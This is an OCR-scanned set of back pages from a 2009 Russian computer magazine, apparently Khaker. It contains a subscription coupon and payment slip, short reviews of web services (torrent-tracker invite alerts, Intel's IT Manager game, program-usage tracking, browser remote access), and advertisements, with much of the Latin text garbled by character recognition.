ВЫГОДА • ГАРАНТИЯ • СЕРВИС 

КАК ОФОРМИТЬ ЗАКАЗ 

1. Разборчиво заполните подписной купон и квитанцию, вырезав 
их из журнала, сделав ксерокопию или распечатав с сайта ѵѵѵѵѵѵ. 
діс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купона и 
квитанции — любым из нижеперечисленных способов: 

• по электронной почте зиЬзсгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! 

Подписка ос|)ормляется в день обработки купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных документов в 
редакцию по факсу или электронной почте; 

• в течение 20 рабочих дней после отправки подписных документов по 
почтовому адресу редакции. 

Рекомендуем использовать факс или электронную почту, в последнем 
случае предварительно отсканировав или сфотографировав документы. 
Подписка оформляется с номера, выходящего через один кален- 
дарный месяц после оплаты. Например, если вы производите оплату в , 
апреле, то журнал будете получать с июня. 



связанным с подпиской, звоните по бесплатным телефонам 8(495)780-88-29 (для москвичей) 
и 8(800)200-3-999 (для жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). Вопросы 
о подписке можно также направлять по адресу іп!о@дІс.ги или прояснить на сайте ѵуѵуѵу.СІС.ш 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАП « 



□ на 6 месяцев 

□ на 12 месяцев 



начиная с 



.200 г. 



I— I Доставлять журнал по почте 
* на домашний адрес 

Доставлять журнал курьером ■ 

□ на адрес офиса* 

□ на домашний адрес** 



(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ; 

индекс 



область/край 



город 



улица 



дом 



корпус 



квартира/офис 



телефон ( 



е-таіі 



сумма оплаты 



*в свободном поле укажи название фирмы 
и другую необходимую информацию 
*в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 



свободное поле 



Извещение 



Кассир 



Квитанция 



Кассир 



ИНН 



7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 



р/с Мо 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


200 г. 





Ф.И.О. 



Подпись плательщика 



ИНН 



7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 



р/с N 0 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


200 г. 





Ф.И.О. 



Подпись плательщика 






[Тэ ТРИ] - ТЕХНИКА ТРЕТЬЕГО ТЫСЯЧЕЛЕТИЯ 




ВЕСЬ МИР ГАДЖЕТОВ! 



ЧИТАЙТЕ 

в АПРЕЛЬСКОМ НОМЕРЕ 
ЛУЧШЕГО ЖУРНАЛА 
О ГАДЖЕТАХ: 



НЕТБУКИ: поколение 2.0 



ЭКСКЛЮЗИВ: 
встречайте ѴАЮ Р! 



СТРАСТИ В ЭПОХУ 
ГАДЖЕТОВ: кого мы 
будем любить через 
сотню лет? 

А ТАКЖЕ... 

ВЫБИРАЕМ! 

Самые свежие 
гаджеты 

ТЕСТИРУЕМ! 

Испытываем 





















БУДУЩЕЕ ИГР: 



руководство по играм 
и игровым платформам 





ЯБЛОЧНОЕ ПЮРЕ: НОВЫЕ СПОСОБЫ АТАКИ ІРЬопе 






I 



II 




I 








Ь«р:/ПІП 

УМУМШ 



орсптгосксг© 



■ Асе Тоггеп?з^ 



в л;отісо 

Тоггепі 



А-Ѳ С . 

■ АОиН Сіпеглаід 



і Д гпак Ратіііу • 



ДЛЯ РЕГИСТРАЦИИ 
НА ПРИВАТНЫХ 
ТОРРЕМТ-ТРЕКЕРАХ 



■ Аигіюпел ^. ^ ■ Ауцмиаиз л 



■ Аѵ!?’а2л 




■ Дчѵ»«сте-НО 


— 






• 




X 




■ ГііГ-НсИѴ^ 


- 


Тіі-.САМЕК^ ^ 


-- 


■ вино.» * 


■ зиме ога л 


- 


■ Ні:МеТѴ-ч 




■ віМиеіс- 


■ Зі(8еЦисел ѵ 


• 


■ ЗііЗПоскл 


- 


■ ы і5оир^ < 




0РЕМТРАСКЕР5 



ѴѴѴѴѴѴ.0РЕМТРАСКЕР5.РР 







ІТМАМА6ЕРЗ 



ІТМАМАОЕРЗ.ІМТЕІ.СОМ 



Инвайт— практически обязательноеусловие для регистрации на любом 
серьезном торрент-трекере. Получить такое приглашение бывает нетак- 
то просто, но есть вариант попасть в «счастливые часы» (когда регистра- 
ция открыта для всех). Это могут быть первые числа месяца или, допустим, 
определенные часы каждый день. Не прозевать та кую возможность 
поможет классный сервис орепігаскегз. Он отслеживает странички с 
регистрациями и в случае их открытия тутже сообщает об этом через Н55. 



Редкий случай, когда игра может быть нетолько интересной, но и полезной. 
ІТ Мападег — это разработанный компанией Іпіеі симулятор работы ІТ-ме- 
неджера. Если хочешь проверить, хватитлиутебя силеноквыполнятьобя- 
занности ІТ-директора — рулить неуправляемыми админами, распределять 
ресурсы вусловиях постоянноурезаемых бюджетов и при всех проблемах 
оставаться «в теме» — срочно приступай к работе. 



а1<сор< 




- V ^ ^ ОН ііщЬ 



О 









ѴѴАКООРА 



ѴѴАКООРА.СОМ 



для МОНИТОРИНГА 
ЗАПУЩЕННЫХ 
НА КОМПЬЮТЕРЕ 
ПРОГРАММ 




ДЛЯ 

УДАЛЕННОГО 
ДОСТУПА 
ЧЕРЕЗ БРАУЗЕР 



Если воспользовавшись этим сервисом, ты обнаружишь, что твои самые 
часто работающие программы — аська, браузер с ВКонтакте или ѴѴагсгаб: 
III, не спеши расстраиваться. Лучше посмотри глобальную статистику по 
всем пользователям сервиса. Мало кто вообще занимается делом :). Про- 
ект, отслеживающий запущенные на компьютере программы, любопытен 
еще и тем, что позволяет найти редкий и интересный софт, используемый 
продвинутыми гиками. 



5КУРЕХ.С0М 



А этот сервис предоставляет возможность удаленного доступа прямо 
через браузер. Правда, из-за использования АсбѵеХ система работает 
только в Іпіегпеі: Ехріогег, но зато устанавливать вообще ничего не нужно: 
ни на сервере, ни на клиенте. Интересно, что в основе ЭкуЕех лежит идея 

удаленного помощника. Нуждающиеся в помощи пользователи могут 

подать сигнал 505, а другие — помочь им. В том числе, за денежки. 



► 144 



ХАКЕР 03 /1 23/ 09 













Требуются курьеры! Достойные условия, 
Классный молодой коллектив. 

Звоните; VI (495) 780 88 25 
или пишите; $а1е$@датеро$!.ги 



РіпаІ Рапіазу Сгузіаі бгапй ТІіеЛ 

СЬгопісІез Ніпд о! Раіез АиЮ IV 
1650 р. 2700 р. 



Nіп^а 6аі(1еп II 
2204 р. 



Ш\ РІ1 + 
Ваіапсе ВоагР 
4950 р. 



Вигпои! РагасІІ$е Іозі ОсІуззеу 



РіпаІ Рап1а$у VII; 
Сгізіз Соге 
1440 р. 



бо(1 о1 ѴѴаг; 
СІіаіпз о1 
ОІутриз 
ІІ440 р. 



Зііеп! Ніи Огідіпз Меіаі Сеаг ЗоІій’^'ЩрШіазуШ Магіо КаП \Л^ 
Еззепііаіз Соііесііоп (РШіпит) ѴѴЬееІ 

1500 р. 2340 р. 1350 р. 2350 р. 



Зои! СаІіЬиг IV 
(03) 

2460 р. 



N 0 Моге Негоез 



ВаШеІіеШ Ва(1 Сот- Меіаі беаг ЗоІісІ 4: бипз 
рапу боІР Бйіііоп о1 Ше Раігіоіз (РАІ) 
2340 р. 2400 р. 



Телефон: 
КІ/ ( 495 ) 780-8825 
млАпѵ.датерозІ.ги 



Все цены действительны на момент публикации рекламы 



Міпіепсіо ѴѴіі 



РІауЗШіоп 2 ЗІіт ХЬох 360 рго (бо вь) 



НЕ СКУЧАЙ! 
ДОМА И 
В ДОРОГЕ 



Зопу РЗР ЗІіт 

Ва$е Раск ВІаск (Р8Р-2008/Ви$) 



РІауЗІаІіоп 3 (80бЬ) 



■ Огромный выбор 

компьютерных и видеоигр 



■ Принимаем заказы через 
Интернет и по телефону 



■ Возможность доставки 
в день заказа 



1 ѵѵ 


^КТчч 1 




1 




Жм 










Новый тариф 

.Твое время 

Общайся в 10 раз дешевле! 

После 5 минут исходящих местных разговоров в день все звонки 
до конца текущего дня становятся В 10 раз ДѲШевле. 



Условие о снижении цены в ю раз будет действовать до конца текущего дня 
при соблюдении параметров, установленных Оператором. 

В зависимости от региона, период времени, на который распространяется условие 
о снижении цены, может различаться. За более подробной информацией, пожалуйста, 
обращайтесь в компанию сети МегаФона Вашего региона. 




Мегафон 

Будущее зависит от тебя 



Реклама 



